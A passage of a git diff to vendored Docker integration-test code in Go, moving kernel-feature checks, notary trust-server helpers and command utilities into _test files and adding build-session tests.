requirement.Is(c, requirements...) +} diff --git a/vendor/github.com/docker/docker/integration-cli/requirements_unix.go b/vendor/github.com/docker/docker/integration-cli/requirements_unix.go deleted file mode 100644 index ef017d8a76..0000000000 --- a/vendor/github.com/docker/docker/integration-cli/requirements_unix.go +++ /dev/null @@ -1,159 +0,0 @@ -// +build !windows - -package main - -import ( - "bytes" - "io/ioutil" - "os/exec" - "strings" - - "github.com/docker/docker/pkg/parsers/kernel" - "github.com/docker/docker/pkg/sysinfo" -) - -var ( - // SysInfo stores information about which features a kernel supports. - SysInfo *sysinfo.SysInfo - cpuCfsPeriod = testRequirement{ - func() bool { - return SysInfo.CPUCfsPeriod - }, - "Test requires an environment that supports cgroup cfs period.", - } - cpuCfsQuota = testRequirement{ - func() bool { - return SysInfo.CPUCfsQuota - }, - "Test requires an environment that supports cgroup cfs quota.", - } - cpuShare = testRequirement{ - func() bool { - return SysInfo.CPUShares - }, - "Test requires an environment that supports cgroup cpu shares.", - } - oomControl = testRequirement{ - func() bool { - return SysInfo.OomKillDisable - }, - "Test requires Oom control enabled.", - } - pidsLimit = testRequirement{ - func() bool { - return SysInfo.PidsLimit - }, - "Test requires pids limit enabled.", - } - kernelMemorySupport = testRequirement{ - func() bool { - return SysInfo.KernelMemory - }, - "Test requires an environment that supports cgroup kernel memory.", - } - memoryLimitSupport = testRequirement{ - func() bool { - return SysInfo.MemoryLimit - }, - "Test requires an environment that supports cgroup memory limit.", - } - memoryReservationSupport = testRequirement{ - func() bool { - return SysInfo.MemoryReservation - }, - "Test requires an environment that supports cgroup memory reservation.", - } - swapMemorySupport = testRequirement{ - func() bool { - return SysInfo.SwapLimit - }, - "Test requires an environment that supports cgroup swap memory limit.", - } - memorySwappinessSupport = testRequirement{ - func() bool { - return SysInfo.MemorySwappiness - }, - "Test requires an environment that supports cgroup memory swappiness.", - } - blkioWeight = testRequirement{ - func() bool { - return SysInfo.BlkioWeight - }, - "Test requires an environment that supports blkio weight.", - } - cgroupCpuset = testRequirement{ - func() bool { - return SysInfo.Cpuset - }, - "Test requires an environment that supports cgroup cpuset.", - } - seccompEnabled = testRequirement{ - func() bool { - return supportsSeccomp && SysInfo.Seccomp - }, - "Test requires that seccomp support be enabled in the daemon.", - } - bridgeNfIptables = testRequirement{ - func() bool { - return !SysInfo.BridgeNFCallIPTablesDisabled - }, - "Test requires that bridge-nf-call-iptables support be enabled in the daemon.", - } - bridgeNfIP6tables = testRequirement{ - func() bool { - return !SysInfo.BridgeNFCallIP6TablesDisabled - }, - "Test requires that bridge-nf-call-ip6tables support be enabled in the daemon.", - } - unprivilegedUsernsClone = testRequirement{ - func() bool { - content, err := ioutil.ReadFile("/proc/sys/kernel/unprivileged_userns_clone") - if err == nil && strings.Contains(string(content), "0") { - return false - } - return true - }, - "Test cannot be run with 'sysctl kernel.unprivileged_userns_clone' = 0", - } - ambientCapabilities = testRequirement{ - func() bool { - content, err := ioutil.ReadFile("/proc/self/status") - if err == nil && strings.Contains(string(content), "CapAmb:") { - return true - } - return false - }, - "Test cannot be run without a kernel (4.3+) supporting ambient capabilities", - } - overlayFSSupported = testRequirement{ - func() bool { - cmd := exec.Command(dockerBinary, "run", "--rm", "busybox", "/bin/sh", "-c", "cat /proc/filesystems") - out, err := cmd.CombinedOutput() - if err != nil { - return false - } - return bytes.Contains(out, []byte("overlay\n")) - }, - "Test cannot be run without suppport for overlayfs", - } - overlay2Supported = testRequirement{ - func() bool { - if !overlayFSSupported.Condition() { - return false - } - - daemonV, err := kernel.ParseRelease(daemonKernelVersion) - if err != nil { - return false - } - requiredV := kernel.VersionInfo{Kernel: 4} - return kernel.CompareKernelVersion(*daemonV, requiredV) > -1 - - }, - "Test cannot be run without overlay2 support (kernel 4.0+)", - } -) - -func init() { - SysInfo = sysinfo.New(true) -} diff --git a/vendor/github.com/docker/docker/integration-cli/requirements_unix_test.go b/vendor/github.com/docker/docker/integration-cli/requirements_unix_test.go new file mode 100644 index 0000000000..7c594f7db4 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/requirements_unix_test.go @@ -0,0 +1,117 @@ +// +build !windows + +package main + +import ( + "bytes" + "io/ioutil" + "os/exec" + "strings" + + "github.com/docker/docker/pkg/parsers/kernel" + "github.com/docker/docker/pkg/sysinfo" +) + +var ( + // SysInfo stores information about which features a kernel supports. + SysInfo *sysinfo.SysInfo +) + +func cpuCfsPeriod() bool { + return testEnv.DaemonInfo.CPUCfsPeriod +} + +func cpuCfsQuota() bool { + return testEnv.DaemonInfo.CPUCfsQuota +} + +func cpuShare() bool { + return testEnv.DaemonInfo.CPUShares +} + +func oomControl() bool { + return testEnv.DaemonInfo.OomKillDisable +} + +func pidsLimit() bool { + return SysInfo.PidsLimit +} + +func kernelMemorySupport() bool { + return testEnv.DaemonInfo.KernelMemory +} + +func memoryLimitSupport() bool { + return testEnv.DaemonInfo.MemoryLimit +} + +func memoryReservationSupport() bool { + return SysInfo.MemoryReservation +} + +func swapMemorySupport() bool { + return testEnv.DaemonInfo.SwapLimit +} + +func memorySwappinessSupport() bool { + return SameHostDaemon() && SysInfo.MemorySwappiness +} + +func blkioWeight() bool { + return SameHostDaemon() && SysInfo.BlkioWeight +} + +func cgroupCpuset() bool { + return testEnv.DaemonInfo.CPUSet +} + +func seccompEnabled() bool { + return supportsSeccomp && SysInfo.Seccomp +} + +func bridgeNfIptables() bool { + return !SysInfo.BridgeNFCallIPTablesDisabled +} + +func bridgeNfIP6tables() bool { + return !SysInfo.BridgeNFCallIP6TablesDisabled +} + +func unprivilegedUsernsClone() bool { + content, err := ioutil.ReadFile("/proc/sys/kernel/unprivileged_userns_clone") + return err != nil || !strings.Contains(string(content), "0") +} + +func ambientCapabilities() bool { + content, err := ioutil.ReadFile("/proc/self/status") + return err != nil || strings.Contains(string(content), "CapAmb:") +} + +func overlayFSSupported() bool { + cmd := exec.Command(dockerBinary, "run", "--rm", "busybox", "/bin/sh", "-c", "cat /proc/filesystems") + out, err := cmd.CombinedOutput() + if err != nil { + return false + } + return bytes.Contains(out, []byte("overlay\n")) +} + +func overlay2Supported() bool { + if !overlayFSSupported() { + return false + } + + daemonV, err := kernel.ParseRelease(testEnv.DaemonInfo.KernelVersion) + if err != nil { + return false + } + requiredV := kernel.VersionInfo{Kernel: 4} + return kernel.CompareKernelVersion(*daemonV, requiredV) > -1 + +} + +func init() { + if SameHostDaemon() { + SysInfo = sysinfo.New(true) + } +} diff --git a/vendor/github.com/docker/docker/integration-cli/test_vars_exec.go b/vendor/github.com/docker/docker/integration-cli/test_vars_exec_test.go similarity index 100% rename from vendor/github.com/docker/docker/integration-cli/test_vars_exec.go rename to vendor/github.com/docker/docker/integration-cli/test_vars_exec_test.go diff --git a/vendor/github.com/docker/docker/integration-cli/test_vars_noexec.go b/vendor/github.com/docker/docker/integration-cli/test_vars_noexec_test.go similarity index 100% rename from vendor/github.com/docker/docker/integration-cli/test_vars_noexec.go rename to vendor/github.com/docker/docker/integration-cli/test_vars_noexec_test.go diff --git a/vendor/github.com/docker/docker/integration-cli/test_vars_noseccomp.go b/vendor/github.com/docker/docker/integration-cli/test_vars_noseccomp_test.go similarity index 100% rename from vendor/github.com/docker/docker/integration-cli/test_vars_noseccomp.go rename to vendor/github.com/docker/docker/integration-cli/test_vars_noseccomp_test.go diff --git a/vendor/github.com/docker/docker/integration-cli/test_vars_seccomp.go b/vendor/github.com/docker/docker/integration-cli/test_vars_seccomp_test.go similarity index 100% rename from vendor/github.com/docker/docker/integration-cli/test_vars_seccomp.go rename to vendor/github.com/docker/docker/integration-cli/test_vars_seccomp_test.go diff --git a/vendor/github.com/docker/docker/integration-cli/test_vars.go b/vendor/github.com/docker/docker/integration-cli/test_vars_test.go similarity index 90% rename from vendor/github.com/docker/docker/integration-cli/test_vars.go rename to vendor/github.com/docker/docker/integration-cli/test_vars_test.go index 97bcddd5f4..82ec58e9e7 100644 --- a/vendor/github.com/docker/docker/integration-cli/test_vars.go +++ b/vendor/github.com/docker/docker/integration-cli/test_vars_test.go @@ -4,7 +4,7 @@ package main // the command is for a sleeping container based on the daemon platform. // The Windows busybox image does not have a `top` command. func sleepCommandForDaemonPlatform() []string { - if daemonPlatform == "windows" { + if testEnv.OSType == "windows" { return []string{"sleep", "240"} } return []string{"top"} diff --git a/vendor/github.com/docker/docker/integration-cli/test_vars_unix.go b/vendor/github.com/docker/docker/integration-cli/test_vars_unix_test.go similarity index 100% rename from vendor/github.com/docker/docker/integration-cli/test_vars_unix.go rename to vendor/github.com/docker/docker/integration-cli/test_vars_unix_test.go diff --git a/vendor/github.com/docker/docker/integration-cli/test_vars_windows.go b/vendor/github.com/docker/docker/integration-cli/test_vars_windows_test.go similarity index 100% rename from vendor/github.com/docker/docker/integration-cli/test_vars_windows.go rename to vendor/github.com/docker/docker/integration-cli/test_vars_windows_test.go diff --git a/vendor/github.com/docker/docker/integration-cli/fixtures/load/emptyLayer.tar b/vendor/github.com/docker/docker/integration-cli/testdata/emptyLayer.tar similarity index 100% rename from vendor/github.com/docker/docker/integration-cli/fixtures/load/emptyLayer.tar rename to vendor/github.com/docker/docker/integration-cli/testdata/emptyLayer.tar diff --git a/vendor/github.com/docker/docker/integration-cli/trust_server.go b/vendor/github.com/docker/docker/integration-cli/trust_server.go deleted file mode 100644 index 18876311a1..0000000000 --- a/vendor/github.com/docker/docker/integration-cli/trust_server.go +++ /dev/null @@ -1,344 +0,0 @@ -package main - -import ( - "fmt" - "io/ioutil" - "net" - "net/http" - "os" - "os/exec" - "path/filepath" - "strings" - "time" - - "github.com/docker/docker/cliconfig" - "github.com/docker/docker/pkg/integration/checker" - "github.com/docker/go-connections/tlsconfig" - "github.com/go-check/check" -) - -var notaryBinary = "notary" -var notaryServerBinary = "notary-server" - -type keyPair struct { - Public string - Private string -} - -type testNotary struct { - cmd *exec.Cmd - dir string - keys []keyPair -} - -const notaryHost = "localhost:4443" -const notaryURL = "https://" + notaryHost - -func newTestNotary(c *check.C) (*testNotary, error) { - // generate server config - template := `{ - "server": { - "http_addr": "%s", - "tls_key_file": "%s", - "tls_cert_file": "%s" - }, - "trust_service": { - "type": "local", - "hostname": "", - "port": "", - "key_algorithm": "ed25519" - }, - "logging": { - "level": "debug" - }, - "storage": { - "backend": "memory" - } -}` - tmp, err := ioutil.TempDir("", "notary-test-") - if err != nil { - return nil, err - } - confPath := filepath.Join(tmp, "config.json") - config, err := os.Create(confPath) - if err != nil { - return nil, err - } - defer config.Close() - - workingDir, err := os.Getwd() - if err != nil { - return nil, err - } - if _, err := fmt.Fprintf(config, template, notaryHost, filepath.Join(workingDir, "fixtures/notary/localhost.key"), filepath.Join(workingDir, "fixtures/notary/localhost.cert")); err != nil { - os.RemoveAll(tmp) - return nil, err - } - - // generate client config - clientConfPath := filepath.Join(tmp, "client-config.json") - clientConfig, err := os.Create(clientConfPath) - if err != nil { - return nil, err - } - defer clientConfig.Close() - - template = `{ - "trust_dir" : "%s", - "remote_server": { - "url": "%s", - "skipTLSVerify": true - } -}` - if _, err = fmt.Fprintf(clientConfig, template, filepath.Join(cliconfig.ConfigDir(), "trust"), notaryURL); err != nil { - os.RemoveAll(tmp) - return nil, err - } - - // load key fixture filenames - var keys []keyPair - for i := 1; i < 5; i++ { - keys = append(keys, keyPair{ - Public: filepath.Join(workingDir, fmt.Sprintf("fixtures/notary/delgkey%v.crt", i)), - Private: filepath.Join(workingDir, fmt.Sprintf("fixtures/notary/delgkey%v.key", i)), - }) - } - - // run notary-server - cmd := exec.Command(notaryServerBinary, "-config", confPath) - if err := cmd.Start(); err != nil { - os.RemoveAll(tmp) - if os.IsNotExist(err) { - c.Skip(err.Error()) - } - return nil, err - } - - testNotary := &testNotary{ - cmd: cmd, - dir: tmp, - keys: keys, - } - - // Wait for notary to be ready to serve requests. - for i := 1; i <= 20; i++ { - if err = testNotary.Ping(); err == nil { - break - } - time.Sleep(10 * time.Millisecond * time.Duration(i*i)) - } - - if err != nil { - c.Fatalf("Timeout waiting for test notary to become available: %s", err) - } - - return testNotary, nil -} - -func (t *testNotary) Ping() error { - tlsConfig := tlsconfig.ClientDefault() - tlsConfig.InsecureSkipVerify = true - client := http.Client{ - Transport: &http.Transport{ - Proxy: http.ProxyFromEnvironment, - Dial: (&net.Dialer{ - Timeout: 30 * time.Second, - KeepAlive: 30 * time.Second, - }).Dial, - TLSHandshakeTimeout: 10 * time.Second, - TLSClientConfig: tlsConfig, - }, - } - resp, err := client.Get(fmt.Sprintf("%s/v2/", notaryURL)) - if err != nil { - return err - } - if resp.StatusCode != http.StatusOK { - return fmt.Errorf("notary ping replied with an unexpected status code %d", resp.StatusCode) - } - return nil -} - -func (t *testNotary) Close() { - t.cmd.Process.Kill() - os.RemoveAll(t.dir) -} - -func (s *DockerTrustSuite) trustedCmd(cmd *exec.Cmd) { - pwd := "12345678" - trustCmdEnv(cmd, notaryURL, pwd, pwd) -} - -func (s *DockerTrustSuite) trustedCmdWithServer(cmd *exec.Cmd, server string) { - pwd := "12345678" - trustCmdEnv(cmd, server, pwd, pwd) -} - -func (s *DockerTrustSuite) trustedCmdWithPassphrases(cmd *exec.Cmd, rootPwd, repositoryPwd string) { - trustCmdEnv(cmd, notaryURL, rootPwd, repositoryPwd) -} - -func trustCmdEnv(cmd *exec.Cmd, server, rootPwd, repositoryPwd string) { - env := []string{ - "DOCKER_CONTENT_TRUST=1", - fmt.Sprintf("DOCKER_CONTENT_TRUST_SERVER=%s", server), - fmt.Sprintf("DOCKER_CONTENT_TRUST_ROOT_PASSPHRASE=%s", rootPwd), - fmt.Sprintf("DOCKER_CONTENT_TRUST_REPOSITORY_PASSPHRASE=%s", repositoryPwd), - } - cmd.Env = append(os.Environ(), env...) -} - -func (s *DockerTrustSuite) setupTrustedImage(c *check.C, name string) string { - repoName := fmt.Sprintf("%v/dockercli/%s:latest", privateRegistryURL, name) - // tag the image and upload it to the private registry - dockerCmd(c, "tag", "busybox", repoName) - - pushCmd := exec.Command(dockerBinary, "push", repoName) - s.trustedCmd(pushCmd) - out, _, err := runCommandWithOutput(pushCmd) - - if err != nil { - c.Fatalf("Error running trusted push: %s\n%s", err, out) - } - if !strings.Contains(string(out), "Signing and pushing trust metadata") { - c.Fatalf("Missing expected output on trusted push:\n%s", out) - } - - if out, status := dockerCmd(c, "rmi", repoName); status != 0 { - c.Fatalf("Error removing image %q\n%s", repoName, out) - } - - return repoName -} - -func (s *DockerTrustSuite) setupTrustedplugin(c *check.C, source, name string) string { - repoName := fmt.Sprintf("%v/dockercli/%s:latest", privateRegistryURL, name) - // tag the image and upload it to the private registry - dockerCmd(c, "plugin", "install", "--grant-all-permissions", "--alias", repoName, source) - - pushCmd := exec.Command(dockerBinary, "plugin", "push", repoName) - s.trustedCmd(pushCmd) - out, _, err := runCommandWithOutput(pushCmd) - - if err != nil { - c.Fatalf("Error running trusted plugin push: %s\n%s", err, out) - } - if !strings.Contains(string(out), "Signing and pushing trust metadata") { - c.Fatalf("Missing expected output on trusted push:\n%s", out) - } - - if out, status := dockerCmd(c, "plugin", "rm", "-f", repoName); status != 0 { - c.Fatalf("Error removing plugin %q\n%s", repoName, out) - } - - return repoName -} - -func notaryClientEnv(cmd *exec.Cmd) { - pwd := "12345678" - env := []string{ - fmt.Sprintf("NOTARY_ROOT_PASSPHRASE=%s", pwd), - fmt.Sprintf("NOTARY_TARGETS_PASSPHRASE=%s", pwd), - fmt.Sprintf("NOTARY_SNAPSHOT_PASSPHRASE=%s", pwd), - fmt.Sprintf("NOTARY_DELEGATION_PASSPHRASE=%s", pwd), - } - cmd.Env = append(os.Environ(), env...) -} - -func (s *DockerTrustSuite) notaryInitRepo(c *check.C, repoName string) { - initCmd := exec.Command(notaryBinary, "-c", filepath.Join(s.not.dir, "client-config.json"), "init", repoName) - notaryClientEnv(initCmd) - out, _, err := runCommandWithOutput(initCmd) - if err != nil { - c.Fatalf("Error initializing notary repository: %s\n", out) - } -} - -func (s *DockerTrustSuite) notaryCreateDelegation(c *check.C, repoName, role string, pubKey string, paths ...string) { - pathsArg := "--all-paths" - if len(paths) > 0 { - pathsArg = "--paths=" + strings.Join(paths, ",") - } - - delgCmd := exec.Command(notaryBinary, "-c", filepath.Join(s.not.dir, "client-config.json"), - "delegation", "add", repoName, role, pubKey, pathsArg) - notaryClientEnv(delgCmd) - out, _, err := runCommandWithOutput(delgCmd) - if err != nil { - c.Fatalf("Error adding %s role to notary repository: %s\n", role, out) - } -} - -func (s *DockerTrustSuite) notaryPublish(c *check.C, repoName string) { - pubCmd := exec.Command(notaryBinary, "-c", filepath.Join(s.not.dir, "client-config.json"), "publish", repoName) - notaryClientEnv(pubCmd) - out, _, err := runCommandWithOutput(pubCmd) - if err != nil { - c.Fatalf("Error publishing notary repository: %s\n", out) - } -} - -func (s *DockerTrustSuite) notaryImportKey(c *check.C, repoName, role string, privKey string) { - impCmd := exec.Command(notaryBinary, "-c", filepath.Join(s.not.dir, "client-config.json"), "key", - "import", privKey, "-g", repoName, "-r", role) - notaryClientEnv(impCmd) - out, _, err := runCommandWithOutput(impCmd) - if err != nil { - c.Fatalf("Error importing key to notary repository: %s\n", out) - } -} - -func (s *DockerTrustSuite) notaryListTargetsInRole(c *check.C, repoName, role string) map[string]string { - listCmd := exec.Command(notaryBinary, "-c", filepath.Join(s.not.dir, "client-config.json"), "list", - repoName, "-r", role) - notaryClientEnv(listCmd) - out, _, err := runCommandWithOutput(listCmd) - if err != nil { - c.Fatalf("Error listing targets in notary repository: %s\n", out) - } - - // should look something like: - // NAME DIGEST SIZE (BYTES) ROLE - // ------------------------------------------------------------------------------------------------------ - // latest 24a36bbc059b1345b7e8be0df20f1b23caa3602e85d42fff7ecd9d0bd255de56 1377 targets - - targets := make(map[string]string) - - // no target - lines := strings.Split(strings.TrimSpace(out), "\n") - if len(lines) == 1 && strings.Contains(out, "No targets present in this repository.") { - return targets - } - - // otherwise, there is at least one target - c.Assert(len(lines), checker.GreaterOrEqualThan, 3) - - for _, line := range lines[2:] { - tokens := strings.Fields(line) - c.Assert(tokens, checker.HasLen, 4) - targets[tokens[0]] = tokens[3] - } - - return targets -} - -func (s *DockerTrustSuite) assertTargetInRoles(c *check.C, repoName, target string, roles ...string) { - // check all the roles - for _, role := range roles { - targets := s.notaryListTargetsInRole(c, repoName, role) - roleName, ok := targets[target] - c.Assert(ok, checker.True) - c.Assert(roleName, checker.Equals, role) - } -} - -func (s *DockerTrustSuite) assertTargetNotInRoles(c *check.C, repoName, target string, roles ...string) { - targets := s.notaryListTargetsInRole(c, repoName, "targets") - - roleName, ok := targets[target] - if ok { - for _, role := range roles { - c.Assert(roleName, checker.Not(checker.Equals), role) - } - } -} diff --git a/vendor/github.com/docker/docker/integration-cli/utils.go b/vendor/github.com/docker/docker/integration-cli/utils.go deleted file mode 100644 index 87d48e41b0..0000000000 --- a/vendor/github.com/docker/docker/integration-cli/utils.go +++ /dev/null @@ -1,79 +0,0 @@ -package main - -import ( - "io" - "os" - "os/exec" - "time" - - "github.com/docker/docker/pkg/integration" - "github.com/docker/docker/pkg/integration/cmd" -) - -func getPrefixAndSlashFromDaemonPlatform() (prefix, slash string) { - if daemonPlatform == "windows" { - return "c:", `\` - } - return "", "/" -} - -// TODO: update code to call cmd.RunCmd directly, and remove this function -func runCommandWithOutput(execCmd *exec.Cmd) (string, int, error) { - result := cmd.RunCmd(transformCmd(execCmd)) - return result.Combined(), result.ExitCode, result.Error -} - -// TODO: update code to call cmd.RunCmd directly, and remove this function -func runCommandWithStdoutStderr(execCmd *exec.Cmd) (string, string, int, error) { - result := cmd.RunCmd(transformCmd(execCmd)) - return result.Stdout(), result.Stderr(), result.ExitCode, result.Error -} - -// TODO: update code to call cmd.RunCmd directly, and remove this function -func runCommand(execCmd *exec.Cmd) (exitCode int, err error) { - result := cmd.RunCmd(transformCmd(execCmd)) - return result.ExitCode, result.Error -} - -// Temporary shim for migrating commands to the new function -func transformCmd(execCmd *exec.Cmd) cmd.Cmd { - return cmd.Cmd{ - Command: execCmd.Args, - Env: execCmd.Env, - Dir: execCmd.Dir, - Stdin: execCmd.Stdin, - Stdout: execCmd.Stdout, - } -} - -func runCommandPipelineWithOutput(cmds ...*exec.Cmd) (output string, exitCode int, err error) { - return integration.RunCommandPipelineWithOutput(cmds...) -} - -func convertSliceOfStringsToMap(input []string) map[string]struct{} { - return integration.ConvertSliceOfStringsToMap(input) -} - -func compareDirectoryEntries(e1 []os.FileInfo, e2 []os.FileInfo) error { - return integration.CompareDirectoryEntries(e1, e2) -} - -func listTar(f io.Reader) ([]string, error) { - return integration.ListTar(f) -} - -func randomTmpDirPath(s string, platform string) string { - return integration.RandomTmpDirPath(s, platform) -} - -func consumeWithSpeed(reader io.Reader, chunkSize int, interval time.Duration, stop chan bool) (n int, err error) { - return integration.ConsumeWithSpeed(reader, chunkSize, interval, stop) -} - -func parseCgroupPaths(procCgroupData string) map[string]string { - return integration.ParseCgroupPaths(procCgroupData) -} - -func runAtDifferentDate(date time.Time, block func()) { - integration.RunAtDifferentDate(date, block) -} diff --git a/vendor/github.com/docker/docker/integration-cli/utils_test.go b/vendor/github.com/docker/docker/integration-cli/utils_test.go new file mode 100644 index 0000000000..fd083681f2 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/utils_test.go @@ -0,0 +1,183 @@ +package main + +import ( + "fmt" + "os" + "os/exec" + "path/filepath" + "strings" + + "github.com/docker/docker/internal/testutil" + "github.com/go-check/check" + "github.com/pkg/errors" + "gotest.tools/icmd" +) + +func getPrefixAndSlashFromDaemonPlatform() (prefix, slash string) { + if testEnv.OSType == "windows" { + return "c:", `\` + } + return "", "/" +} + +// TODO: update code to call cmd.RunCmd directly, and remove this function +// Deprecated: use gotest.tools/icmd +func runCommandWithOutput(execCmd *exec.Cmd) (string, int, error) { + result := icmd.RunCmd(transformCmd(execCmd)) + return result.Combined(), result.ExitCode, result.Error +} + +// Temporary shim for migrating commands to the new function +func transformCmd(execCmd *exec.Cmd) icmd.Cmd { + return icmd.Cmd{ + Command: execCmd.Args, + Env: execCmd.Env, + Dir: execCmd.Dir, + Stdin: execCmd.Stdin, + Stdout: execCmd.Stdout, + } +} + +// ParseCgroupPaths parses 'procCgroupData', which is output of '/proc//cgroup', and returns +// a map which cgroup name as key and path as value. +func ParseCgroupPaths(procCgroupData string) map[string]string { + cgroupPaths := map[string]string{} + for _, line := range strings.Split(procCgroupData, "\n") { + parts := strings.Split(line, ":") + if len(parts) != 3 { + continue + } + cgroupPaths[parts[1]] = parts[2] + } + return cgroupPaths +} + +// RandomTmpDirPath provides a temporary path with rand string appended. +// does not create or checks if it exists. +func RandomTmpDirPath(s string, platform string) string { + // TODO: why doesn't this use os.TempDir() ? + tmp := "/tmp" + if platform == "windows" { + tmp = os.Getenv("TEMP") + } + path := filepath.Join(tmp, fmt.Sprintf("%s.%s", s, testutil.GenerateRandomAlphaOnlyString(10))) + if platform == "windows" { + return filepath.FromSlash(path) // Using \ + } + return filepath.ToSlash(path) // Using / +} + +// RunCommandPipelineWithOutput runs the array of commands with the output +// of each pipelined with the following (like cmd1 | cmd2 | cmd3 would do). +// It returns the final output, the exitCode different from 0 and the error +// if something bad happened. +// Deprecated: use icmd instead +func RunCommandPipelineWithOutput(cmds ...*exec.Cmd) (output string, err error) { + if len(cmds) < 2 { + return "", errors.New("pipeline does not have multiple cmds") + } + + // connect stdin of each cmd to stdout pipe of previous cmd + for i, cmd := range cmds { + if i > 0 { + prevCmd := cmds[i-1] + cmd.Stdin, err = prevCmd.StdoutPipe() + + if err != nil { + return "", fmt.Errorf("cannot set stdout pipe for %s: %v", cmd.Path, err) + } + } + } + + // start all cmds except the last + for _, cmd := range cmds[:len(cmds)-1] { + if err = cmd.Start(); err != nil { + return "", fmt.Errorf("starting %s failed with error: %v", cmd.Path, err) + } + } + + defer func() { + var pipeErrMsgs []string + // wait all cmds except the last to release their resources + for _, cmd := range cmds[:len(cmds)-1] { + if pipeErr := cmd.Wait(); pipeErr != nil { + pipeErrMsgs = append(pipeErrMsgs, fmt.Sprintf("command %s failed with error: %v", cmd.Path, pipeErr)) + } + } + if len(pipeErrMsgs) > 0 && err == nil { + err = fmt.Errorf("pipelineError from Wait: %v", strings.Join(pipeErrMsgs, ", ")) + } + }() + + // wait on last cmd + out, err := cmds[len(cmds)-1].CombinedOutput() + return string(out), err +} + +type elementListOptions struct { + element, format string +} + +func existingElements(c *check.C, opts elementListOptions) []string { + var args []string + switch opts.element { + case "container": + args = append(args, "ps", "-a") + case "image": + args = append(args, "images", "-a") + case "network": + args = append(args, "network", "ls") + case "plugin": + args = append(args, "plugin", "ls") + case "volume": + args = append(args, "volume", "ls") + } + if opts.format != "" { + args = append(args, "--format", opts.format) + } + out, _ := dockerCmd(c, args...) + var lines []string + for _, l := range strings.Split(out, "\n") { + if l != "" { + lines = append(lines, l) + } + } + return lines +} + +// ExistingContainerIDs returns a list of currently existing container IDs. +func ExistingContainerIDs(c *check.C) []string { + return existingElements(c, elementListOptions{element: "container", format: "{{.ID}}"}) +} + +// ExistingContainerNames returns a list of existing container names. +func ExistingContainerNames(c *check.C) []string { + return existingElements(c, elementListOptions{element: "container", format: "{{.Names}}"}) +} + +// RemoveLinesForExistingElements removes existing elements from the output of a +// docker command. +// This function takes an output []string and returns a []string. +func RemoveLinesForExistingElements(output, existing []string) []string { + for _, e := range existing { + index := -1 + for i, line := range output { + if strings.Contains(line, e) { + index = i + break + } + } + if index != -1 { + output = append(output[:index], output[index+1:]...) + } + } + return output +} + +// RemoveOutputForExistingElements removes existing elements from the output of +// a docker command. +// This function takes an output string and returns a string. +func RemoveOutputForExistingElements(output string, existing []string) string { + res := RemoveLinesForExistingElements(strings.Split(output, "\n"), existing) + return strings.Join(res, "\n") +} diff --git a/vendor/github.com/docker/docker/integration/build/build_session_test.go b/vendor/github.com/docker/docker/integration/build/build_session_test.go new file mode 100644 index 0000000000..dde4b427b4 --- /dev/null +++ b/vendor/github.com/docker/docker/integration/build/build_session_test.go @@ -0,0 +1,129 @@ +package build + +import ( + "context" + "io/ioutil" + "net/http" + "strings" + "testing" + + dclient "github.com/docker/docker/client" + "github.com/docker/docker/internal/test/fakecontext" + "github.com/docker/docker/internal/test/request" + "github.com/moby/buildkit/session" + "github.com/moby/buildkit/session/filesync" + "golang.org/x/sync/errgroup" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" + "gotest.tools/skip" +) + +func TestBuildWithSession(t *testing.T) { + skip.If(t, !testEnv.DaemonInfo.ExperimentalBuild) + + client := testEnv.APIClient() + + dockerfile := ` + FROM busybox + COPY file / + RUN cat /file + ` + + fctx := fakecontext.New(t, "", + fakecontext.WithFile("file", "some content"), + ) + defer fctx.Close() + + out := testBuildWithSession(t, client, client.DaemonHost(), fctx.Dir, dockerfile) + assert.Check(t, is.Contains(out, "some content")) + + fctx.Add("second", "contentcontent") + + dockerfile += ` + COPY second / + RUN cat /second + ` + + out = testBuildWithSession(t, client, client.DaemonHost(), fctx.Dir, dockerfile) + assert.Check(t, is.Equal(strings.Count(out, "Using cache"), 2)) + assert.Check(t, is.Contains(out, "contentcontent")) + + du, err := client.DiskUsage(context.TODO()) + assert.Check(t, err) + assert.Check(t, du.BuilderSize > 10) + + out = testBuildWithSession(t, client, client.DaemonHost(), fctx.Dir, dockerfile) + assert.Check(t, is.Equal(strings.Count(out, "Using cache"), 4)) + + du2, err := client.DiskUsage(context.TODO()) + assert.Check(t, err) + assert.Check(t, is.Equal(du.BuilderSize, du2.BuilderSize)) + + // rebuild with regular tar, confirm cache still applies + fctx.Add("Dockerfile", dockerfile) + // FIXME(vdemeester) use sock here + res, body, err := request.Do( + "/build", + request.Host(client.DaemonHost()), + request.Method(http.MethodPost), + request.RawContent(fctx.AsTarReader(t)), + request.ContentType("application/x-tar")) + assert.NilError(t, err) + assert.Check(t, is.DeepEqual(http.StatusOK, res.StatusCode)) + + outBytes, err := request.ReadBody(body) + assert.NilError(t, err) + assert.Check(t, is.Contains(string(outBytes), "Successfully built")) + assert.Check(t, is.Equal(strings.Count(string(outBytes), "Using cache"), 4)) + + _, err = client.BuildCachePrune(context.TODO()) + assert.Check(t, err) + + du, err = client.DiskUsage(context.TODO()) + assert.Check(t, err) + assert.Check(t, is.Equal(du.BuilderSize, int64(0))) +} + +func testBuildWithSession(t *testing.T, client dclient.APIClient, daemonHost string, dir, dockerfile string) (outStr string) { + ctx := context.Background() + sess, err := session.NewSession(ctx, "foo1", "foo") + assert.Check(t, err) + + fsProvider := filesync.NewFSSyncProvider([]filesync.SyncedDir{ + {Dir: dir}, + }) + sess.Allow(fsProvider) + + g, ctx := errgroup.WithContext(ctx) + + g.Go(func() error { + return sess.Run(ctx, client.DialSession) + }) + + g.Go(func() error { + // FIXME use sock here + res, body, err := request.Do( + "/build?remote=client-session&session="+sess.ID(), + request.Host(daemonHost), + request.Method(http.MethodPost), + request.With(func(req *http.Request) error { + req.Body = ioutil.NopCloser(strings.NewReader(dockerfile)) + return nil + }), + ) + if err != nil { + return err + } + assert.Check(t, is.DeepEqual(res.StatusCode, http.StatusOK)) + out, err := request.ReadBody(body) + assert.NilError(t, err) + assert.Check(t, is.Contains(string(out), "Successfully built")) + sess.Close() + outStr = string(out) + return nil + }) + + err = g.Wait() + assert.Check(t, err) + return +} diff --git a/vendor/github.com/docker/docker/integration/build/build_squash_test.go b/vendor/github.com/docker/docker/integration/build/build_squash_test.go new file mode 100644 index 0000000000..4cd282a976 --- /dev/null +++ b/vendor/github.com/docker/docker/integration/build/build_squash_test.go @@ -0,0 +1,103 @@ +package build + +import ( + "bytes" + "context" + "io" + "io/ioutil" + "strings" + "testing" + + "github.com/docker/docker/api/types" + 